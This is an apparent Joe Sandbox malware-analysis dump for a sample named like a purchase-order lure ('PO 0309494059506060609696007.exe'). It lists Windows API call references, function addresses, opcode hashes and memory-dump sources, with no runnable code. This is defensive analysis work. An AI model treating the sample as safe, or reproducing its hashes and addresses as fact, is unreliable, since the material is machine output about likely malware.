                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nst14AC.tmp$C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll
                                                • API String ID: 3109718747-3932230764
                                                • Opcode ID: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                                • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                • Opcode Fuzzy Hash: 838fef82e08b076f5d49a30e748d8985297f415acc20a77e8e630ea48f411f47
                                                • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 661993671275bbb46ae38db8578875f32a5da435d3121ec1b1bc5f38f47a8141
                                                • Instruction ID: 238961c084d27bc44671c66f3de5cf2a27aa9e09376a63463d418f343a2c05dd
                                                • Opcode Fuzzy Hash: 661993671275bbb46ae38db8578875f32a5da435d3121ec1b1bc5f38f47a8141
                                                • Instruction Fuzzy Hash: 8E51D632D1405AAE8B409FF98540EAEB6B9EF45354F01427BD404A3B44D7B39F8AC7E1
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 6E4224D6
                                                  • Part of subcall function 6E42122C: lstrcpynW.KERNEL32(00000000,?,6E4212DF,00000019,6E4211BE,-000000A0), ref: 6E42123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6E42245C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E422477
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: efee9b4b8ed2168a2f159eae8b3b28402ac690ef68e14d86cb24b2d25eb258ba
                                                • Instruction ID: c155a748f56fa3fe091ef58c5d4e2974919c43ea57d65fccdbd0a30341fa2547
                                                • Opcode Fuzzy Hash: efee9b4b8ed2168a2f159eae8b3b28402ac690ef68e14d86cb24b2d25eb258ba
                                                • Instruction Fuzzy Hash: DE41CFB0414605EFD710DFB6E844E6677B8FB49314B00883FE046CB641EFB4A586CBA5
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                APIs
                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                • wsprintfW.USER32 ref: 00404B88
                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 053f193c39b459fdf5e8fe5933fd42d3277041dca56571489995df9c0bb26361
                                                • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                • Opcode Fuzzy Hash: 053f193c39b459fdf5e8fe5933fd42d3277041dca56571489995df9c0bb26361
                                                • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                APIs
                                                • CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C48
                                                • CharNextW.USER32(00000000), ref: 00405C4D
                                                • CharNextW.USER32(00000000), ref: 00405C65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\
                                                • API String ID: 3213498283-3404278061
                                                • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                • Instruction ID: 75375947fb2108fa8988f35f37760ff259c71c6e50658764317197b9124938a5
                                                • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                • Instruction Fuzzy Hash: DAF0BB61908F1199FB3177644C49E7B66BCDB55350B04853FD641B71C0D7F84C818BD9
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B95
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 00405B9F
                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405BB1
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 004052C5
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                  • Part of subcall function 0040427D: SendMessageW.USER32(00010446,00000000,00000000,00000000), ref: 0040428F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                • GlobalFree.KERNEL32(?), ref: 00403936
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3081826266
                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-224404859
                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6E42116A
                                                • GlobalFree.KERNEL32(00000000), ref: 6E4211C7
                                                • GlobalFree.KERNEL32(00000000), ref: 6E4211D9
                                                • GlobalFree.KERNEL32(?), ref: 6E421203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 20a42091e1e262a9f6fd3ab3ab2d95ca6ff07ecb39f93667366708bee4eba27b
                                                • Instruction ID: 8bf4ae9b942f96d4fcf7a834d0e78e9f43d5856a2d4005762239e27090d3b13d
                                                • Opcode Fuzzy Hash: 20a42091e1e262a9f6fd3ab3ab2d95ca6ff07ecb39f93667366708bee4eba27b
                                                • Instruction Fuzzy Hash: D63172B15001029FD7009FF9ED45E7677E8EB4A210700053BE844EA358E77AED49D7A2
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                                Execution Graph

                                                Execution Coverage:9.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:31
                                                Total number of Limit Nodes:4
